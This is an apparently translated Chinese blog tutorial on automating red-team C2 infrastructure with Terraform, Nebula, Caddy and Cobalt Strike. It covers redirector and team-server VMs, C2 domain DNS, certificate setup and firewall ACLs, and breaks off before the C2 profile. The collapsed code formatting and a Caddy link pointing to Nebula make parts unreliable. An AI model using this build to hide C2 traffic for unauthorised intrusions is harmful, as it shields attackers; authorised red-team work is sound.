在这篇文章中,我将向读者展示如何使用 Terraform 和 Nebula 的端到端加密后端通信层构建全自动 C2 基础设施。
能够在几分钟内快速构建一个 C2 基础设施,包括所有相关的设置和拆除逻辑,对于任何攻击性安全团队或运营商来说都是一项巨大的优势。在本文中,我将详细演示如何使用Terraform、Nebula、Caddy和Cobalt Strike构建一个完全自动化的 C2 基础设施。
特别感谢@byt3bl33d3r和@bin3xish477让我注意到 Caddy 可以作为 Nginx/Apache 的替代品。
TL;DR
如果阅读下面的所有内容对你来说太难了:)你可以简单地浏览一下论文,如果你只对代码感兴趣的话,可以检查下面的 git repo。
https://github.com/maliciousgroup/C2_Automation?ref=blog.malicious.group
先决条件
在开发过程中,我将使用Kali Linux作为主机操作系统,并使用Jetbrains的 PyCharm Professional进行 HCL 和 Python 开发。对于云资源,我将使用Linode作为虚拟机和 DNS 设置的提供商。
在介绍这些材料时,我还会假设读者已经了解我将要介绍的至少部分主题,但为了以防万一,我将在每一步都发布链接以供参考。
构建设置
我将使用 Python 作为 Terraform 构建的包装器,这样一旦构建完成并经过测试,它就很容易转变为一个更容易实现自动化的工具,但是,大多数工作将在 Python 项目的命令行上进行。
第一步是使用虚拟环境准备一个新的 Python 3.9 项目以便于管理,如下所示。
创建新项目后,在 IDE 中打开终端Alt + F12并创建以下文件夹。
mkdir -p src/{config,templates}mkdir -p src/templates/{certificates,configs,files,keys}mkdir -p src/templates/configs/{nebula,web}
如果命令成功执行,您应该会在项目中看到以下文件结构。
完成初始文件夹结构后,下一步是下载 Terraform 二进制文件并将其放置在venv/bin文件夹中。这将确保二进制文件位于虚拟环境执行 PATH 中。
wget -O /tmp/tf.zip https://releases.hashicorp.com/terraform/1.2.9/terraform_1.2.9_linux_amd64.zipunzip /tmp/tf.zip -d venv/bin/
一旦 Terraform 二进制文件到位,我应该能够通过运行以下命令来检查版本。
terraform -version
Terraform 二进制文件就绪,初始文件夹结构也已完成,我就可以开始专注于构建基础架构了。首先,我需要为Linode提供商构建模板,以便启动本次构建所需的六 (6) 台不同的机器。
虚拟机
首先,我将通过touch在src/templates目录中运行以下命令来创建管理各种资源所需的所有模板文件。
cd src/templatestouch {providers,edge-redirectors,internal-redirectors,variables,output,team-server,lighthouse,security,dns}.tf
如果上述命令成功,文件结构应如下所示。
我要修改的第一个文件是providers.tf,因为该文件是连接到 Linode API 所必需的。根据以下文档https://registry.terraform.io/providers/linode/linode/latest/docs?ref=blog.malicious.group,您可以看到在使用最新版本创建 Terraform 模板时要使用的提供程序的确切格式和版本。
providers.tf
terraform {required_providers {linode = {source = "linode/linode" } }}provider "linode" {token = var.linode_token}
您可以从上面的文件中看到,Linode 的提供商也需要一个token(API 密钥),我将把它添加到variables.tf文件中,如下所示。
variables.tf
variable"linode_token" {description = "The Linode API Token" default = "920fd6f3d417600c871ff40..."}variable "linode_domain" {description = "The domain to be used at Linode" default = "windows.pe"}
还有一个linode_domain变量用于保存构建中使用的 C2 域providers.tf。variables.tf
此构建中使用的六个虚拟机存储在四个文件中:
-
lighthouse.tf
-
team-server.tf
-
edge-redirectors.tf
-
internal-redirectors.tf
edge-redirectors.tf和模板internal-redirectors.tf各包含两个虚拟机,其他模板仅包含一个虚拟机。虚拟机在下方网络图中以绿色图标显示。
在为上述每个实例创建模板之前,我首先需要设置一个 SSH 密钥。这可以通过使用 Terraform tls_private_key资源完全自动化完成,该资源会生成一个安全私钥,并将其编码为 PEM(RFC 1421)和 OpenSSH PEM(RFC 4716)格式。为此,我将修改目录security.tf中的文件src/templates,如下所示。
security.tf
resource"random_string""random" {length = 16 special = true}resource "tls_private_key""temp_key" {algorithm = "RSA" rsa_bits = 4096}resource "linode_sshkey""ssh_key" {label = "key" ssh_key = chomp(tls_private_key.temp_key.public_key_openssh)}
该linode_sshkey资源是构建每个实例所必需的,通过使用内置tls_private_key资源,我可以动态生成一个 4096 位 RSA 密钥,然后用于访问每个实例以进行设置和安装过程。此文件中使用的另一个资源是random_string
现在,我可以使用以下文件中所示的资源开始构建每个机器模板linode_instance。此时,除了名称之外,每个机器模板都将label相同linode_instance。
lighthouse.tf
resource"linode_instance""lighthouse" {label = "lighthouse" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","touch /tmp/task.complete" ] }}
edge-redirectors.tf
# HTTPS Dedicated Redirectorresource"linode_instance""edge-redirector-1" {label = "edge-redirector-1" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","touch /tmp/task.complete" ] }}# DNS Dedicated Redirectorresource "linode_instance""edge-redirector-2" {label = "edge-redirector-2" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","touch /tmp/task.complete" ] }}
# HTTPS Internal Redirectorresource"linode_instance""internal-redirector-1" {label = "internal-redirector-1" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","touch /tmp/task.complete" ] }}# DNS Internal Redirectorresource "linode_instance""internal-redirector-2" {label = "internal-redirector-2" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","touch /tmp/task.complete" ] }}
resource"linode_instance""team-server" {label = "team-server" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","touch /tmp/task.complete" ] }}
所有上述实例都将使用 Linode 特有的资源,例如和其他资源,这些资源可从文件中的 集合中linode_instance获得。有各种选项可用于设置操作系统、以及机器本身的 。providerproviders.tflinode_instanceimageregionlabel
每个模板还包含一条connection指令,用于设置通过 SSH 连接到实例所需的连接变量。该connection指令是使用配置程序所必需的remote-exec,该程序允许在机器上线后运行终端命令的引导程序。
现在所有模板都完成了,我可以使用文件中linode_resource的指令显示每个实例的 IP 地址。构建完成后,它将显示每个实例的名称和 IP 地址。output output.tf
output "lighthouse" {value = linode_instance.lighthouse.ip_address}output "edge-redirector-1" {value = linode_instance.edge-redirector-1.ip_address}output "edge-redirector-2" {value = linode_instance.edge-redirector-2.ip_address}output "internal-redirector-1" {value = linode_instance.internal-redirector-1.ip_address}output "internal-redirector-2" {value = linode_instance.internal-redirector-2.ip_address}output "team-server" {value = linode_instance.team-server.ip_address}
构建完成后,该output指令将打印与每个块关联的值。此时,我可以进行测试以确保实例确实构建成功且没有任何错误,这可以通过使用下面显示的 Terraform 命令来完成。
terraform init
该terraform init命令会初始化一个包含 Terraform 配置文件的工作目录。这是在编写新的 Terraform 配置或克隆现有配置后应该运行的第一个命令。多次运行此命令是安全的。
terraform apply
该terraform apply命令执行 Terraform 计划中建议的操作。如果配置没有语法错误,它将提示用户输入“yes”以开始构建。
成功创建后,您应该会看到如上所示的部分中打印了六个不同的linode_resource实例 IP 地址Outputs。为了验证这一点,我还可以在 Linode 仪表板中看到实例创建成功,没有任何问题。
现在我知道当前构建已经成功,我将在继续下一步之前销毁基础架构,以避免在基础架构配置仍在运行时进行更改。以下命令将销毁构建。
terraform destroy
该terraform destroy命令是销毁由特定 Terraform 配置管理的所有远程对象的便捷方法。
成功后,您可以看到所有资源均已销毁,且没有任何错误。构建已达到稳定状态,现在是时候继续设置 DNS 记录,然后再进入 Nebula 端到端加密网络层。
DNS 设置
为了创建正确路由 DNS 和 HTTPS 流量所需的 DNS 记录,我将创建一个dns.tf模板以将域添加到 Linode 帐户,然后创建三个 (3) 个不同的 DNS 记录来处理 HTTP 和 DNS 路由。
dns.tf
resource"linode_domain""c2-domain" {type = "master" domain = var.linode_domain soa_email = "soa@${var.linode_domain}" tags = [] depends_on = [linode_instance.edge-redirector-1]}resource "linode_domain_record""root" {domain_id = linode_domain.c2-domain.id name = var.linode_domain record_type = "A" target = linode_instance.edge-redirector-1.ip_address depends_on = [linode_instance.edge-redirector-1]}resource "linode_domain_record""ns1" {domain_id = linode_domain.c2-domain.id name = "ns1" record_type = "A" target = linode_instance.internal-redirector-2.ip_address depends_on = [linode_instance.edge-redirector-2]}resource "linode_domain_record""dns" {domain_id = linode_domain.c2-domain.id record_type = "NS" target = "ns1.${var.linode_domain}" depends_on = [linode_domain_record.ns1]}
在上面的模板中,我使用了由同一提供商dns.tf提供的两个新指令。资源用于在 Linode 帐户中识别或创建特定域,指令用于为同一域设置特定的 DNS 记录。此外,该指令确保在应用 DNS 修改之前创建虚拟机。linode linode_domain linode_domain_record depends_on
现在运行另一个构建测试以确保 DNS 记录按照预期使用正确的 IP 创建。
terraform apply
构建成功,所以现在我需要检查 Linode 仪表板以验证域是否windows.pe已添加到帐户。
好的,现在检查以确保创建了正确的记录,并指向正确的虚拟机。
成功!域名已添加,正确的记录也已创建。虚拟机设置完毕,DNS配置也已完成,现在我可以专注于创建Nebula端到端加密网络层,以便安全地将C2流量隧道传输到团队服务器。
操作员 SSH 密钥设置
现在是时候编写一个小的 bash 脚本了,该脚本用于在基础设施构建时生成操作员 SSH 密钥,并在基础设施销毁时删除该密钥。为此,我将generate_key.sh在src/templates/keys目录中添加以下文件,如下所示。
generate_key.sh
#!/usr/bin/env bash# shellcheck disable=SC2046# shellcheck disable=SC2164SCRIPT_PATH="$(cd $(dirname "$0") > /dev/null 2>&1; pwd -P)"iftest -f "${SCRIPT_PATH}"/red_nebula_rsa; thenecho"[Warning] Keys seem to already exist. Skipping key generation"exitfiif ! ssh-keygen -b 4096 -t rsa -f "${SCRIPT_PATH}"/red_nebula_rsa -q -N ""; thenecho"[Error] There was an error generating the SSH key for Terraform"exitfi
为了确保此 bash 脚本在构建时运行并删除其在销毁期间创建的键,我将在下一部分创建两个新模板来处理此功能。
Nebula设置
为了设置 Nebula 网络,用于构建基础架构的主机需要下载 Nebula 二进制文件,生成新的 CA 证书,然后为本次构建中使用的每台机器生成密钥。这可以在创建任何机器之前完成,这样我就可以将特定的密钥移动到每台主机上,以测试和验证网络状态。
为了实现这一点,我将创建两个新文件放入src/templates目录中。这两个文件分别名为setup.tf和cleanup.tf,负责处理所有构建前和构建后操作,以确保操作员在每次运行之间都有一个干净的环境。
setup.tf
resource "null_resource""setup" { provisioner "local-exec" {command = <<-EOT wget -O /tmp/nebula.tar.gz https://github.com/slackhq/nebula/releases/download/v1.6.0/nebula-linux-amd64.tar.gzmkdir /tmp/nebula tar -zxvf /tmp/nebula.tar.gz -C /tmp/nebula chmod +xkeys/generate_key.shkeys/generate_key.shcd certificates && /tmp/nebula/nebula-cert ca -name "Red Nebula, Inc" /tmp/nebula/nebula-cert sign -name "lighthouse1" -ip "192.168.100.1/24" /tmp/nebula/nebula-cert sign -name "edge-redirector-1" -ip "192.168.100.10/24" -groups "edge" /tmp/nebula/nebula-cert sign -name "edge-redirector-2" -ip "192.168.100.20/24" -groups "edge" /tmp/nebula/nebula-cert sign -name "internal-redirector-1" -ip "192.168.100.110/24" -groups "internal" /tmp/nebula/nebula-cert sign -name "internal-redirector-2" -ip "192.168.100.120/24" -groups "internal" /tmp/nebula/nebula-cert sign -name "team-server" -ip "192.168.100.200/24" -groups "team-server" /tmp/nebula/nebula-cert sign -name "operator" -ip "192.168.100.250/24" -groups "operator" EOT interpreter = ["/usr/bin/env", "bash", "-c"] }}
上述模板setup.tf会下载 Nebula 二进制文件,然后设置新的 CA 证书,并为每台连接到 Nebula 网络的机器生成密钥。它还包含两个命令来运行generate_key.sh上述 bash 脚本。
cleanup.tf
resource "null_resource""pre_setup" { provisioner "local-exec" { when = destroycommand = <<-EOT rm certificates/* rm keys/red* rm -rf /tmp/working_dir /tmp/nebula* EOT interpreter = ["/usr/bin/env", "bash", "-c"] }}
在上面的模板中cleanup.tf,构建过程中生成的文件全部被删除,目录也被移除。
现在,Nebula 密钥已在构建过程中创建,我需要创建一些 Nebula 配置文件来设置每个节点的 IP 范围和单独的地址,以及一些 ACL 规则来允许特定的流量。以下配置文件将存储在src/templates/configs/nebula目录中。
-
config-lighthouse.yaml
-
config-teamserver.yaml
-
config-edge.yaml
-
config-internal.yaml
-
config-operator.yaml
pki:ca: /etc/nebula/ca.crtcert: /etc/nebula/host.crtkey: /etc/nebula/host.keystatic_host_map:lighthouse:am_lighthouse: truelisten:host: 0.0.0.0port: 4242firewall:conntrack:tcp_timeout: 12mudp_timeout: 3mdefault_timeout: 10moutbound: - port: anyproto: icmphost: anyinbound: - port: anyproto: icmphost: any
“Lighthouse”配置的唯一 ACL 允许来自其他 Nebula 连接节点的 ICMP 流量。这纯粹是为了确保所有节点都已连接,出于安全预防措施,可以将其移除。
pki:ca: /etc/nebula/ca.crtcert: /etc/nebula/host.crtkey: /etc/nebula/host.keystatic_host_map:"192.168.100.1": ["LIGHTHOUSE_IP_ADDRESS:4242"]lighthouse:am_lighthouse: falseinterval: 60hosts: - "192.168.100.1"listen:host: 0.0.0.0port: 4242firewall:conntrack:tcp_timeout: 12mudp_timeout: 3mdefault_timeout: 10moutbound: - port: anyproto: icmphost: any - port: anyproto: anygroup: internal - port: anyproto: anygroup: operatorinbound: - port: anyproto: icmphost: any - port: anyproto: anygroup: internal - port: anyproto: anygroup: operator
“Team-Server”配置包含一个允许来自该internal组和该operator组的流量的ACL。任何进入“Team-Server”的C2流量都必须首先经过“Internal-Redirectors”。
config-edge.yaml
pki:ca: /etc/nebula/ca.crtcert: /etc/nebula/host.crtkey: /etc/nebula/host.keystatic_host_map:"192.168.100.1": ["LIGHTHOUSE_IP_ADDRESS:4242"]lighthouse:am_lighthouse: falseinterval: 60hosts: - "192.168.100.1"listen:host: 0.0.0.0port: 4242firewall:conntrack:tcp_timeout: 12mudp_timeout: 3mdefault_timeout: 10moutbound: - port: anyproto: icmphost: any - port: anyproto: anygroup: internalinbound: - port: anyproto: icmphost: any - port: anyproto: anygroup: internal
“Edge-Redirectors”配置包含一个ACL,该ACLinternal仅允许来自该组的流量,这是设计使然。任何进入“Edge-Redirectors”的C2流量都需要通过“Internal-Redirectors”进行隧道传输,才能到达“Team-Server”。
config-internal.yaml
pki:ca: /etc/nebula/ca.crtcert: /etc/nebula/host.crtkey: /etc/nebula/host.keystatic_host_map:"192.168.100.1": ["LIGHTHOUSE_IP_ADDRESS:4242"]lighthouse:am_lighthouse: falseinterval: 60hosts: - "192.168.100.1"listen:host: 0.0.0.0port: 4242firewall:conntrack:tcp_timeout: 12mudp_timeout: 3mdefault_timeout: 10moutbound: - port: anyproto: icmphost: any - port: anyproto: anygroup: edge - port: anyproto: anygroup: team-serverinbound: - port: anyproto: icmphost: any - port: anyproto: anygroup: edge - port: anyproto: anygroup: team-server
“内部重定向器”配置包含一个 ACL,允许来自edge和team-server组的流量。这是因为“内部重定向器”负责将数据从“边缘重定向器”移动到“团队服务器”。
config-operator.yaml
pki:ca: /tmp/nebula/ca.crtcert: /tmp/nebula/operator.crtkey: /tmp/nebula/operator.keystatic_host_map:"192.168.100.1": ["LIGHTHOUSE_IP_ADDRESS:4242"]lighthouse:am_lighthouse: falseinterval: 60hosts: - "192.168.100.1"listen:host: 0.0.0.0port: 4242firewall:conntrack:tcp_timeout: 12mudp_timeout: 3mdefault_timeout: 10moutbound: - port: anyproto: icmphost: any - port: anyproto: anygroup: team-serverinbound: - port: anyproto: icmphost: any - port: anyproto: anygroup: team-server
“操作员”配置包含仅可访问“团队服务器”的 ACL。
您可能注意到还有一个LIGHTHOUSE_IP_ADDRESS占位符,但这将在构建过程中通过sed
创建 Nebula 证书、配置和密钥后,就该弄清楚如何在构建过程中将所有必需的文件移动到每台机器,以确保 Nebula 拥有连接所需的一切。
幸好,借助 Terraform 预置程序,将文件从操作员主机移动到远程机器变得非常容易,file它以文件作为 its ,source并将其放置位置作为 its destination。为了确保 Nebula 能够在每台机器上连接,我需要修改 Linode 模板,以包含运行 Nebula 所需的文件和命令。
lighthouse.tf
resource"linode_instance""lighthouse" {label = "lighthouse" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-lighthouse.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/lighthouse1.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/lighthouse1.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}
edge-redirectors.tf
# HTTPS Dedicated Redirectorresource"linode_instance""edge-redirector-1" {label = "edge-redirector-1" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-edge.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/edge-redirector-1.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/edge-redirector-1.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}# DNS Dedicated Redirectorresource "linode_instance""edge-redirector-2" {label = "edge-redirector-2" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-edge.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/edge-redirector-2.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/edge-redirector-2.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}
# HTTPS Dedicated Internal Redirectorresource"linode_instance""internal-redirector-1" {label = "internal-redirector-1" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-internal.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/internal-redirector-1.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/internal-redirector-1.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}# DNS Dedicated Internal Redirectorresource "linode_instance""internal-redirector-2" {label = "internal-redirector-2" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-internal.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/internal-redirector-2.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/internal-redirector-2.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}
team-server.tf
resource"linode_instance""team-server" {label = "team-server" image = "linode/ubuntu18.04" region = "us-east" type = "g6-nanode-1" authorized_keys = [linode_sshkey.ssh_key.ssh_key] root_pass = random_string.random.result swap_size = 256 private_ip = false depends_on = [linode_instance.lighthouse] connection {host = self.ip_address user = "root" type = "ssh" private_key = tls_private_key.temp_key.private_key_pem timeout = "10m" } provisioner "file" {source = "keys/red_nebula_rsa.pub" destination = "/tmp/key.pub" } provisioner "file" {source = "configs/nebula/config-teamserver.yaml" destination = "/tmp/config.yaml" } provisioner "file" {source = "certificates/ca.crt" destination = "/tmp/ca.crt" } provisioner "file" {source = "certificates/team-server.crt" destination = "/tmp/host.crt" } provisioner "file" {source = "certificates/team-server.key" destination = "/tmp/host.key" } provisioner "file" {source = "/tmp/nebula/nebula" destination = "/tmp/nebula" } provisioner "remote-exec" {inline = ["export PATH=$PATH:/usr/local/bin","export DEBIAN_FRONTEND=noninteractive","apt-get update","yes | apt-get upgrade","cat /tmp/key.pub >> /root/.ssh/authorized_keys","rm /tmp/key.pub","mkdir /etc/nebula","mv /tmp/host.* /etc/nebula","mv /tmp/ca.crt /etc/nebula","mv /tmp/config.yaml /etc/nebula","mv /tmp/nebula /etc/nebula/nebula","sed -i 's/LIGHTHOUSE_IP_ADDRESS/${linode_instance.lighthouse.ip_address}/g' /etc/nebula/config.yaml","chmod +x /etc/nebula/nebula","echo '/etc/nebula/nebula -config /etc/nebula/config.yaml' | at now + 1 min","touch /tmp/task.complete" ] }}
如上所述,您可以看到六个file配置程序将以下文件从主机移动到远程服务器:
-
keys/red_nebula_rsa.pub
-
configs/nebula/config-<instance>.yaml
-
certificates/ca.crt
-
certificates/<instance_name>.key
-
certificates/<instance_name>.crt
-
/tmp/nebula/nebula
file在配置器将所有内容移动到目录后/tmp,remote-exec配置器会将文件从/tmp目录移动到服务器上的最终位置。之后,一旦所有文件都到位,nebula
我应该能够再次测试构建,但这次我应该能够使用构建期间生成的 SSH 密钥登录到每台机器,并确保 Nebula 网络已启动并连接。
terraform apply
如果构建成功,您应该看到与上图相同的输出。每个实例的 IP 地址也应显示在输出中。
现在,我想测试通过配置器移动到服务器的 SSH 密钥file,以及 Nebula 网络连接。我将从team-server实例开始,因此要登录,我将在src/templates目录中使用以下命令。
ssh -i keys/red_nebula_rsa root@66.228.47.96
脚本生成的 SSH 密钥generate_key.sh运行良好,现在检查 Nebula 是否正在运行,tun0以及我是否可以使用以下命令 ping 所有其他端点。
ifconfig | grep tun0ping -c 1192.168.100.1ping -c 1192.168.100.10ping -c 1192.168.100.20ping -c 1192.168.100.110ping -c 1192.168.100.120
如果命令执行成功,您应该可以看到每个主机都能 ping 通,并且tun0接口处于活动状态。一旦所有测试都正常,我将使用terraform destroyagain 销毁构建,以避免在构建仍然处于活动状态时进行更改。
目前,构建已达到稳定状态,Linode 基础设施自动化(包括 DNS)运行正常,端到端加密的 Nebula 网络层也运行正常。现在该关注流量路由了。
Caddy 设置
为了设置 Caddy HTTPS 服务器,我首先需要在edge-redirector-1实例上安装 Go 语言,以便从源代码构建 Caddy,或者直接下载二进制文件。本次构建我将直接使用GitHub-https://github.com/slackhq/nebula?ref=blog.malicious.group上的二进制文件,因为部署起来更快。
Caddy 需要进行配置才能设置 HTTP/S 路由规则以及 SSL。由于 HTTP/S 和 DNS 服务器上的配置需要与所使用的 C2 配置文件匹配,因此我将使用来自此处webbug_getonly.profile代码库的Cobalt Strike 的修改版本。C2 配置文件将存储在目录中。src/templates/files
webbug_getonly.profile
